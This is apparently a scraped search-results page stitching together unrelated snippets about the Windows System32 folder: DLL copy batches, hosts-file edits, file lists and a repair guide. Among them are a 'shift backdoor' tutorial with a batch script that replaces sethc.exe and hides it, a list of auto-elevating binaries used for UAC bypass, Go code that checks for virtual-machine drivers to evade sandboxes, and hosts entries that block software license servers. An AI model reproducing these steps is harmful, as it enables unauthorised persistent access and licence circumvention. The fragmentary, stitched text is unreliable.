“C:\Program Files\常用绿色软件\soft\”将‘FinalData.exe'、‘OfficeDiary.exe'、‘DisplayX.exe'这三个程序拷贝到‘C:\WINDOWS\system32...@echo off ren %windir%\system32\dbnetlib.dll dbnetlib.old ren %windir%\system32\dbnmpntw.dll dbnmpntw.old...%windir%\system32\ copy /y dbnmpntw.dll %windir%\system32\ copy /y ntwdblib.DLL %windir%\system32\..." "C:\windows\system32\" exit 4....\dbnmpntw.dll" c:\windows\system32\ copy /y "%homepath%\桌面\ERP数据库客户端文件\ntwdblib.DLL" c:\windows\system32
Windows\System32\drivers\hidparse.sys Windows\System32\drivers\hidusb.sys Windows\System32\drivers\i8042prt.sys...Windows\System32\drivers\kbdclass.sys Windows\System32\drivers\kbdhid.sys Windows\System32\drivers\mouclass.sys...Windows\System32\drivers\mouhid.sys Windows\System32\drivers\zh-CN\hidclass.sys.mui Windows\System32...\System32\drivers\i8042prt.sys Windows\System32\drivers\kbdclass.sys Windows\System32\drivers\kbdhid.sys...Windows\System32\drivers\mouclass.sys Windows\System32\drivers\mouhid.sys Windows\System32\drivers\zh-CN
FIND /C /I "backup.lumion3d.net" %WINDIR%\system32\drivers\etc\hosts IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE...%^127.0.0.1 backup.lumion3d.net>>%WINDIR%\system32\drivers\etc\hosts FIND /C /I "license.lumion3d.net...>>%WINDIR%\system32\drivers\etc\hosts FIND /C /I "backup.lumion3d.com" %WINDIR%\system32\drivers\etc...%\system32\drivers\etc\hosts FIND /C /I "upload.lumion3d.com" %WINDIR%\system32\drivers\etc\hosts IF...%^127.0.0.1 cad.glodon.com>>%WINDIR%\system32\drivers\etc\hosts
>c:\windows\system32\drivers\etc\hosts echo 169.254.0.3 mirrors.tencentyun.com>> c:\windows\system32...>> c:\windows\system32\drivers\etc\hosts echo 169.254.0.19 kms.tencentyun.com>> c:\windows\system32...>> c:\windows\system32\drivers\etc\hosts echo 169.254.0.80 time2.tencentyun.com>> c:\windows\system32...\system32\drivers\etc\hosts echo 169.254.0.138 invoke.tat-tc.tencent.cn>> c:\windows\system32\drivers...\system32\drivers\etc\hosts
\system32\dccw.exe c:\windows\system32\dcomcnfg.exe c:\windows\system32\DeviceEject.exe c:\windows...\system32\DeviceProperties.exe c:\windows\system32\djoin.exe c:\windows\system32\easinvoker.exe c:...\eventvwr.exe c:\windows\system32\fodhelper.exe c:\windows\system32\fsquirt.exe c:\windows\system32...\system32\msconfig.exe c:\windows\system32\msra.exe c:\windows\system32\MultiDigiMon.exe c:\windows...c:\windows\system32\Taskmgr.exe c:\windows\system32\tcmsetup.exe c:\windows\system32\TpmInit.exe c:
\system32\dccw.exe c:\windows\system32\dcomcnfg.exe c:\windows\system32\DeviceEject.exe c:\windows...\system32\DeviceProperties.exe c:\windows\system32\djoin.exe c:\windows\system32\easinvoker.exe c:...\windows\system32\EASPolicyManagerBrokerHost.exe c:\windows\system32\eudcedit.exe c:\windows\system32...\eventvwr.exe c:\windows\system32\fodhelper.exe c:\windows\system32\fsquirt.exe c:\windows\system32...\system32\msconfig.exe c:\windows\system32\msra.exe c:\windows\system32\MultiDigiMon.exe c:\windows
fack("C:\\windows\\System32\\Drivers\\vmtray.dll") fack("C:\\windows\\System32\\Drivers\\VMToolsHook.dll...") fack("C:\\windows\\System32\\Drivers\\VBoxVideo.sys") fack("C:\\windows\\System32\\vboxdisp.dll"...) fack("C:\\windows\\System32\\vboxhook.dll") fack("C:\\windows\\System32\\vboxoglerrorspu.dll") fack...("C:\\windows\\System32\\vboxoglpassthroughspu.dll") fack("C:\\windows\\System32\\vboxservice.exe")...fack("C:\\windows\\System32\\vboxtray.exe") fack("C:\\windows\\System32\\VBoxControl.exe") } func main
>c:\windows\system32\drivers\etc\hostsecho 169.254.0.3 mirrors.tencentyun.com>> c:\windows\system32...>> c:\windows\system32\drivers\etc\hostsecho 169.254.0.23 metadata.tencentyun.com>> c:\windows\system32...>> c:\windows\system32\drivers\etc\hostsecho 169.254.0.2 ntpupdate.tencentyun.com>> c:\windows\system32...windows\system32\drivers\etc\hostsecho 169.254.0.83 time5.tencentyun.com>> c:\windows\system32\drivers...\system32\drivers\etc\hostsecho 169.254.0.138 notify.tat-tc.tencent.cn>> c:\windows\system32\drivers
%systemroot\system32\dmdskres.dll %systemroot\system32\imageres.dll %systemroot\system32\mmres.dll %...systemroot\system32\networkexplorer.dll %systemroot%\system32\pnidui.dll %systemroot%\system32\sensorscpl.dll...%systemroot%\system32\setupapi.dll %systemroot%\system32\shell32.dll %systemroot%\system32\wmploc.dll...\system32\dsuiext.dll %systemroot\system32\gameux.dll %systemroot\system32\ieframe.dll %systemroot\system32...systemroot\system32\mmcndmgr.dll %systemroot\system32\moricons.dll %systemroot\system32\pifmgr.dll 我们一起来看看它们都是什么样的吧
echo 169.254.0.3 mirrors.tencentyun.com >> c:\windows\system32\drivers\etc\hosts echo 169.254.0.15...update2.agent.tencentyun.com >> c:\windows\system32\drivers\etc\hosts echo 169.254.0.4...\system32\drivers\etc\hosts echo 169.254.0.19 kms.tencentyun.com >> c:\windows\system32\drivers...\etc\hosts echo 169.254.0.54 kms1.tencentyun.com >> c:\windows\system32\drivers\etc\hosts echo...\system32\drivers\etc\hosts echo 169.254.0.82 time4.tencentyun.com >> c:\windows\system32\drivers
,例如 图片.png linux也是类似的,IP空格或Tab然后域名 图片.png 以管理员身份打开cmd命令行,执行如下命令可以添加hosts echo. >> c:\windows\system32...\drivers\etc\hosts echo 169.254.0.3 mirrors.tencentyun.com >> c:\windows\system32\drivers\etc...\hosts echo 169.254.0.15 update2.agent.tencentyun.com >> c:\windows\system32\drivers\etc\hosts...echo 169.254.0.4 receiver.barad.tencentyun.com >> c:\windows\system32\drivers\etc\hosts echo...\system32\drivers\etc\hosts echo 169.254.0.26 windowsupdate.tencentyun.com >> c:\windows\system32
0x01 shift后门 说到这个东西就先提一下它的来源——Windows粘滞键 Windows粘滞键本身是为了不方便同时按组合键的人群使用的功能,在连按5次shift键后打开粘滞键,也就是启动了system32...\explorer.exe c:\windows\system32\sethc.exe @copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache...\sethc.exe @attrib c:\windows\system32\sethc.exe +h @attrib c:\windows\system32\dllcache\sethc.exe +h...copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows...\system32\dllcache\sethc.exe attrib c:\windows\system32\sethc.exe +h attrib c:\windows\system32\dllcache
\*.dllC:\Windows\System32\ 目录的一些.dll动态库文件、C:\Windows\System32\drivers\ 目录的一些.sys驱动文件,可能导致进不去系统。...\config举2个case①系统进不去,报错注册表文件C:\Windows\System32\config\SYSTEM损坏,替换为C:\Windows\System32\config\RegBack...14、C:\Windows\System32\perf*.datC:\Windows\System32\perfc009.datC:\Windows\System32\perfd009.datC:\Windows...\System32\perfh009.datC:\Windows\System32\perfi009.dat这4个文件丢失或损坏,会出现远程不上(远程在证书黄色感叹号界面瞬间报错后,远程服务自动停止运行...的木马,C:\Windows\System32\svchost.exe 缺失可能跟这个木马有关。
C:\Windows\system32\msvcrt.dll 0x77590000 - 0x775a9000 C:\Windows\SYSTEM32\sechost.dll 0x75c80000...- 0x75d21000 C:\Windows\system32\RPCRT4.dll 0x77150000 - 0x77219000 C:\Windows\system32\USER32.dll...0x77220000 - 0x772bd000 C:\Windows\system32\USP10.dll 0x75a00000 - 0x75a1f000 C:\Windows\system32\...- 0x760c7000 C:\Windows\system32\SHLWAPI.dll 0x772c0000 - 0x7741c000 C:\Windows\system32\ole32.dll...\system32\urlmon.dll 0x75660000 - 0x7577c000 C:\Windows\system32\CRYPT32.dll 0x755e0000 - 0x755ec000
方法1:用everything搜索比如要搜system32目录的.dll文件输入目录的绝对路径 空格 .dll,然后按路径排序,然后按住shift选择system32根目录的文件,右击点复制完整路径和文件名...,粘贴到记事本文件里即可图片方法2:用powershell命令,比如导出windows根目录 system32根目录的可执行文件,举例如下比较low的代码cd "c:\windows\system32"...比较牛逼的代码Get-ChildItem -Path C:\Windows\System32 -Filter ***.dll** -File | Sort-Object Length -Descending...| ForEach-Object { $_.Name }Get-ChildItem -Path C:\Windows\System32 -Filter ***.dll** -File | Sort-Object...Length -Descending | ForEach-Object { $_.BaseName }(Get-ChildItem -Path C:\Windows\System32 -Filter
文件夹 %windir%\System32文件夹存放着各种软件所需要的运行库等。...一般情况下是C:\Windows\System32,作用和Linux系统下的/usr/share/类似。...由于很多老软件类程序中硬编码了System32文件夹,因此为了向后兼容性,在64位系统中仍然保留了这个文件夹。...%windir%\system32\catroot %windir%\system32\catroot2 %windir%\system32\driverstore %windir%\system32\...drivers\etc %windir%\system32\logfiles %windir%\system32\spool 要在32位程序中访问System32文件夹的时候,可以通过以下方式访问。
off REM 10.0.19041.1288 bad file comes from KB5006670 :_start copy C:\win32spl.dll.good C:\Windows\System32.../y :wmicVersion pathToBinary [variableToSaveTo] setlocal set "item1=C:\Windows\System32\win32spl.dll..." set "item1=%item1:\=\\%" set "item2=C:\Windows\System32\win32spl.dll.good" set "item2=%item2:\=\\%"...\System32\win32spl.dll" /grant SYSTEM:F ren C:\Windows\System32\win32spl.dll win32spl-%existver%.dll...copy C:\Windows\System32\win32spl.dll.good C:\Windows\System32\win32spl.dll /Y net start spooler goto
;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\...;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\...;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\...;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\...;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\
\cmd.exe C:\windows\system32\sethc.exe 或者在拿到远程桌面后直接在系统里面替换 这里再贴一个用的比较广泛的批处理,具体步骤可以自己分析 @copy c:\windows...\explorer.exe c:\windows\system32\sethc.exe @copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache...\sethc.exe @attrib c:\windows\system32\sethc.exe +h @attrib c:\windows\system32\dllcache\sethc.exe +h...copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows...\system32\dllcache\sethc.exe attrib c:\windows\system32\sethc.exe +h attrib c:\windows\system32\dllcache
领取专属 10元无门槛券
手把手带您无忧上云